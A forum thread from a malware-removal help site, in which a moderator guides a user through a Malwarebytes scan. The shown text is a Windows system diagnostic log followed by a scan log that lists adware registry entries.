Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HP Photo Creations Messager.job => C:\ProgramData\HP Photo Creations\MessageCheck.exe
Task: C:\Windows\Tasks\Start Registry Reviver for FAMILIE-LE-NB@PhanCo(logon).job => C:\Program Files\ReviverSoft\Registry Reviver\RegistryReviver.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-06-25 11:01 - 2013-10-17 22:32 - 00020472 _____ () C:\Windows\system32\spool\PRTPROCS\x64\TeamViewer_PrintProcessor.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2014-08-12 16:29 - 2014-08-12 16:29 - 00301152 _____ () C:\Program Files\Alwil Software\Avast5\aswProperty.dll
2014-08-20 22:26 - 2014-08-20 22:26 - 02800128 _____ () C:\Program Files\Alwil Software\Avast5\defs\14082000\algo.dll
2014-08-21 16:14 - 2014-08-21 16:14 - 02800128 _____ () C:\Program Files\Alwil Software\Avast5\defs\14082001\algo.dll
2012-10-22 16:55 - 2012-10-22 16:55 - 01113600 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\DMSManager.dll
2012-10-05 17:27 - 2012-10-05 17:27 - 00704000 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\ContentDirectoryPresenter.dll
2012-08-21 19:06 - 2012-08-21 19:06 - 00107008 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\DCMCDP.dll
2012-08-21 19:06 - 2012-08-21 19:06 - 00101376 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\FolderCDP.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00077312 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\MetadataFramework.dll
2012-08-14 11:13 - 2012-08-14 11:13 - 00520234 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\sqlite3.dll
2012-08-14 11:13 - 2012-08-14 11:13 - 00450560 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\MoodExtractor.dll
2012-08-14 11:43 - 2012-08-14 11:43 - 05717504 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\DCMImgExtractor.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00028672 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\AutoChaptering.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00147456 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\libexpat.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00012288 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\VideoThumb.dll
2012-08-14 11:43 - 2012-08-14 11:43 - 04671488 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\avcodec-52.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00070656 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\avutil-50.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00686080 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\avformat-52.dll
2012-08-14 11:43 - 2012-08-14 11:43 - 00152064 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\swscale-0.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00028160 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\AudioExtractor.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00063488 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\ID3Driver.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00366592 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\tag.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00289792 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\libThumbnail.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00023040 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\RichInfoDriver.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00017920 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\VideoExtractor.dll
2012-10-22 16:55 - 2012-10-22 16:55 - 00117248 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\ThumbnailMaker.dll
2012-10-22 16:55 - 2012-10-22 16:55 - 01033216 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\ImageMagickWrapper.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00133120 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\VideoMetadataDriver.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00290816 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\libKeyFrame.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00024064 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\SECMetaDriver.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00012288 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\ImageExtractor.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00024064 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\photoDriver.dll
2012-08-14 11:43 - 2012-08-14 11:43 - 00399826 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\libexif-12.dll.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00013824 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\TextExtractor.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00032768 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\Autobackup.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00055808 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\RosettaAllShare.dll
2012-08-21 11:25 - 2012-08-21 11:25 - 00227840 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\boost_serialization-vc90-mt-1_47.dll
2012-08-21 11:26 - 2012-08-21 11:26 - 00038912 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\boost_date_time-vc90-mt-1_47.dll
2012-08-21 11:25 - 2012-08-21 11:25 - 00012800 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\boost_system-vc90-mt-1_47.dll
2012-08-21 11:26 - 2012-08-21 11:26 - 00046592 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\boost_thread-vc90-mt-1_47.dll
2012-08-14 11:42 - 2012-08-14 11:42 - 00044032 _____ () C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\us.dll
2014-04-23 16:05 - 2014-04-23 16:05 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-04-23 16:04 - 2014-04-23 16:04 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2014-04-23 16:04 - 2014-04-23 16:04 - 00237384 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2014-08-12 16:29 - 2014-08-12 16:29 - 19329904 _____ () C:\Program Files\Alwil Software\Avast5\libcef.dll
2013-05-02 18:54 - 2013-05-02 18:54 - 00170496 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\d89f0252d910d617de1de783a812f840\IsdiInterop.ni.dll
2010-07-02 18:24 - 2010-03-04 10:08 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData\Temp:1A60DE96
AlternateDataStreams: C:\ProgramData\Temp:4D066AD2
AlternateDataStreams: C:\ProgramData\Temp:5D7E5A8F
AlternateDataStreams: C:\ProgramData\Temp:CDFF58FE
AlternateDataStreams: C:\ProgramData\Temp:E1F04E8D
AlternateDataStreams: C:\ProgramData\Temp:E36F5B57
AlternateDataStreams: C:\Users\Papa\Downloads\.DS_Store:AFP_AfpInfo
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: Comrade.exe => C:\Program Files (x86)\GameSpy\Comrade\Comrade.exe
MSCONFIG\startupreg: mobilegeni daemon => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe
MSCONFIG\startupreg: Starter => C:\Program Files (x86)\Driver-Soft\DriverGenius\StarterW3i.exe
MSCONFIG\startupreg: uTorrent => C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\uTorrent\uTorrent.exe /MINIMIZED
 
==================== Faulty Device Manager Devices =============
 
Name: High Definition Audio-Controller
Description: High Definition Audio-Controller
Class Guid: {4d36e97d-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: HDAudBus
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/21/2014 04:13:38 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcInit started failed with 0
 
Error: (08/21/2014 04:13:38 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcMain failed with 0
 
Error: (08/20/2014 10:25:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 14879813
 
Error: (08/20/2014 10:25:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 14879813
 
Error: (08/20/2014 10:25:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (08/20/2014 10:25:33 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 14878799
 
Error: (08/20/2014 10:25:33 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 14878799
 
Error: (08/20/2014 10:25:33 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (08/20/2014 10:25:32 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 14877629
 
Error: (08/20/2014 10:25:32 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 14877629
 
 
System errors:
=============
Error: (08/21/2014 04:16:07 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: Der Dienst "Intel® Management & Security Application User Notification Service" ist von folgendem Dienst abhängig: LMS. Dieser Dienst ist eventuell nicht installiert.
 
Error: (08/21/2014 04:13:47 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Das Laden folgender Boot- oder Systemstarttreiber ist fehlgeschlagen: 
sptd
 
Error: (08/21/2014 04:13:46 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "IP-Hilfsdienst" wurde mit folgendem Fehler beendet: 
%%13
 
Error: (08/21/2014 04:13:39 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "PnkBstrA" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2
 
Error: (08/21/2014 04:13:38 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Bluetooth Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2
 
Error: (08/21/2014 04:12:58 PM) (Source: sptd) (EventID: 4) (User: )
Description: Der Treiber hat einen internen Fehler in seinen Datenstrukturen für  festgestellt.
 
Error: (08/20/2014 10:29:13 PM) (Source: BROWSER) (EventID: 8032) (User: )
Description: Das Einlesen der Sicherungsliste durch den Suchdienst schlug auf Transport "\Device\NetBT_Tcpip_{17D9B602-7FC4-4529-A557-E1456C40D5AF}" zu oft fehl.
Der Sicherungssuchdienst wird beendet.
 
Error: (08/20/2014 10:25:33 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {C332C124-340D-4430-AA0D-C75602876FCC}
 
Error: (08/20/2014 06:02:18 PM) (Source: bowser) (EventID: 8003) (User: )
Description: Der Hauptsuchdienst erhielt eine Serverankündigung vom Computer "FAMILIE-LE-PC1",
der der Hauptsuchdienst der Domäne für den NetBT_Tcpip_{17D9B602-7FC4-4529-A557-E1456C40D5AF}-Transport zu sein scheint.
Der Hauptsuchdienst wurde beendet oder es wird eine Auswahl erzwungen.
 
Error: (08/20/2014 04:30:42 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: Der Dienst "Intel® Management & Security Application User Notification Service" ist von folgendem Dienst abhängig: LMS. Dieser Dienst ist eventuell nicht installiert.
 
 
Microsoft Office Sessions:
=========================
Error: (08/21/2014 04:13:38 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcInit started failed with 0
 
Error: (08/21/2014 04:13:38 PM) (Source: AllShare Framework DMS) (EventID: 1) (User: )
Description: AllShare Framework DMSSvcMain failed with 0
 
Error: (08/20/2014 10:25:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 14879813
 
Error: (08/20/2014 10:25:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 14879813
 
Error: (08/20/2014 10:25:34 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (08/20/2014 10:25:33 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 14878799
 
Error: (08/20/2014 10:25:33 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 14878799
 
Error: (08/20/2014 10:25:33 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (08/20/2014 10:25:32 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 14877629
 
Error: (08/20/2014 10:25:32 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 14877629
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-08-11 20:49:26.988
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-24 22:11:54.648
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-13 21:19:16.160
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-13 20:49:06.298
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-13 19:43:07.577
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-13 15:30:03.076
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-13 15:06:46.399
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-13 14:42:01.277
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-13 14:01:43.744
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
  Date: 2014-06-10 23:42:11.578
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\dsound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 460 @ 2.53GHz
Percentage of memory in use: 45%
Total physical RAM: 3766.69 MB
Available physical RAM: 2048.06 MB
Total Pagefile: 7531.51 MB
Available Pagefile: 5401.14 MB
Total Virtual: 8192 MB
Available Virtual: 8191.85 MB
 
==================== Drives ================================
 
Drive c: (Acer) (Fixed) (Total:685.54 GB) (Free:272.31 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 698.6 GB) (Disk ID: 348EEB9E)
Partition 1: (Not Active) - (Size=13 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=685.5 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================

  • 0

#10
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
How is the computer behaving now, what problems are you experiencing

Please download Malwarebytes Anti-Malware to your desktop
Install the progamme and select update
Once it has updated select Settings > Detection and Protection
Tick Scan for rootkits

MBAMsettings.JPG

Go back to the Dashboard and select Scan Now

MBAMScan.JPG

If threats are detected, click the Apply Actions button, MBAM will ask for a reboot.

MBAMReboot.JPG

MBAMLog.JPG

On completion of the scan (or after the reboot) select View Detailed Log
Select Export > Select text file and save to the desktop
Attach/Post that log
  • 0

Advertisements


#11
langvu900

langvu900

    Member

  • Topic Starter
  • Member
  • PipPip
  • 11 posts

Hi there again, i have some problem. I got alot of pop-ups  from Avast. And when export the log and opened it, i got the reboost window. But anyway, here is the log:

 

Malwarebytes Anti-Malware

www.malwarebytes.org
 
Scan Date: 22.08.2014
Scan Time: 16:48:03
Logfile: adw2.txt
Administrator: Yes
 
Version: 2.00.2.1012
Malware Database: v2014.08.22.04
Rootkit Database: v2014.08.21.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled
 
OS: Windows 7
CPU: x64
File System: NTFS
User: Papa
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 599421
Time Elapsed: 28 min, 57 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 84
PUP.Optional.DefaultTab.A, HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{7F6AFBF1-E065-4627-A2FD-810366367D01}, , [7722ab1e502b5dd96a88f581dc26c040], 
PUP.Optional.DefaultTab.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{7F6AFBF1-E065-4627-A2FD-810366367D01}, , [7722ab1e502b5dd96a88f581dc26c040], 
PUP.Optional.DefaultTab.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{7F6AFBF1-E065-4627-A2FD-810366367D01}, , [7722ab1e502b5dd96a88f581dc26c040], 
PUP.Optional.DefaultTab.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{7F6AFBF1-E065-4627-A2FD-810366367D01}, , [7722ab1e502b5dd96a88f581dc26c040], 
PUP.Optional.DefaultTab.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{7F6AFBF1-E065-4627-A2FD-810366367D01}, , [7722ab1e502b5dd96a88f581dc26c040], 
PUP.Optional.RelatedSearchs.A, HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{96A25A24-2E87-4374-8A50-CC6F943FCE4D}, , [8415eddc0378db5b8257ed87ac56e818], 
PUP.Optional.RelatedSearchs.A, HKLM\SOFTWARE\CLASSES\DefaultTabToolbarBHO.DefaultTabToolbar, , [8415eddc0378db5b8257ed87ac56e818], 
PUP.Optional.RelatedSearchs.A, HKLM\SOFTWARE\CLASSES\DefaultTabToolbarBHO.DefaultTabToolbar.1, , [8415eddc0378db5b8257ed87ac56e818], 
PUP.Optional.RelatedSearchs.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\DefaultTabToolbarBHO.DefaultTabToolbar, , [8415eddc0378db5b8257ed87ac56e818], 
PUP.Optional.RelatedSearchs.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\DefaultTabToolbarBHO.DefaultTabToolbar.1, , [8415eddc0378db5b8257ed87ac56e818], 
PUP.Optional.RelatedSearchs.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{96A25A24-2E87-4374-8A50-CC6F943FCE4D}, , [8415eddc0378db5b8257ed87ac56e818], 
PUP.Optional.RelatedSearchs.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{96A25A24-2E87-4374-8A50-CC6F943FCE4D}, , [8415eddc0378db5b8257ed87ac56e818], 
PUP.Optional.RelatedSearchs.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{96A25A24-2E87-4374-8A50-CC6F943FCE4D}, , [8415eddc0378db5b8257ed87ac56e818], 
PUP.Optional.RelatedSearchs.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{96A25A24-2E87-4374-8A50-CC6F943FCE4D}, , [8415eddc0378db5b8257ed87ac56e818], 
PUP.Optional.RelatedSearchs.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{96A25A24-2E87-4374-8A50-CC6F943FCE4D}, , [8415eddc0378db5b8257ed87ac56e818], 
PUP.Optional.Smartbar.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{FD36FEBE-DBA1-4597-9DD1-B13794B92F68}, , [76234e7b2457cd696bc5b5f4fc06ed13], 
PUP.Optional.Smartbar.A, HKLM\SOFTWARE\CLASSES\Bechiro.smartbarHlpr, , [76234e7b2457cd696bc5b5f4fc06ed13], 
PUP.Optional.Smartbar.A, HKLM\SOFTWARE\CLASSES\Bechiro.smartbarHlpr.1, , [76234e7b2457cd696bc5b5f4fc06ed13], 
PUP.Optional.Smartbar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Bechiro.smartbarHlpr, , [76234e7b2457cd696bc5b5f4fc06ed13], 
PUP.Optional.Smartbar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Bechiro.smartbarHlpr.1, , [76234e7b2457cd696bc5b5f4fc06ed13], 
PUP.Optional.Smartbar.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{FD36FEBE-DBA1-4597-9DD1-B13794B92F68}, , [76234e7b2457cd696bc5b5f4fc06ed13], 
PUP.Optional.Smartbar.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{FD36FEBE-DBA1-4597-9DD1-B13794B92F68}, , [76234e7b2457cd696bc5b5f4fc06ed13], 
PUP.Optional.Smartbar.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{FD36FEBE-DBA1-4597-9DD1-B13794B92F68}, , [76234e7b2457cd696bc5b5f4fc06ed13], 
PUP.Optional.Smartbar.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{0CFBE80D-5608-4309-A0F5-3B1414833432}, , [2d6ca128bbc041f5121d852490726997], 
PUP.Optional.Smartbar.A, HKLM\SOFTWARE\CLASSES\Bechiro.smartbardskBnd, , [2d6ca128bbc041f5121d852490726997], 
PUP.Optional.Smartbar.A, HKLM\SOFTWARE\CLASSES\Bechiro.smartbardskBnd.1, , [2d6ca128bbc041f5121d852490726997], 
PUP.Optional.Smartbar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Bechiro.smartbardskBnd, , [2d6ca128bbc041f5121d852490726997], 
PUP.Optional.Smartbar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Bechiro.smartbardskBnd.1, , [2d6ca128bbc041f5121d852490726997], 
PUP.Optional.Smartbar.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{0CFBE80D-5608-4309-A0F5-3B1414833432}, , [2d6ca128bbc041f5121d852490726997], 
PUP.Optional.MySearchDial.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{3004627E-F8E9-4E8B-909D-316753CBA923}, , [0c8dffca8bf0ab8bea63feabb54df709], 
PUP.Optional.MySearchDial.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{3004627E-F8E9-4E8B-909D-316753CBA923}, , [0c8dffca8bf0ab8bea63feabb54df709], 
PUP.Optional.Delta.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{82E1477C-B154-48D3-9891-33D83C26BCD3}, , [217823a6b3c8a98d6b21f0b89c66e21e], 
PUP.Optional.Delta.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{82E1477C-B154-48D3-9891-33D83C26BCD3}, , [217823a6b3c8a98d6b21f0b89c66e21e], 
PUP.Optional.Delta.A, HKU\S-1-5-21-4169419405-2626366916-160398126-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{82E1477C-B154-48D3-9891-33D83C26BCD3}, , [217823a6b3c8a98d6b21f0b89c66e21e], 
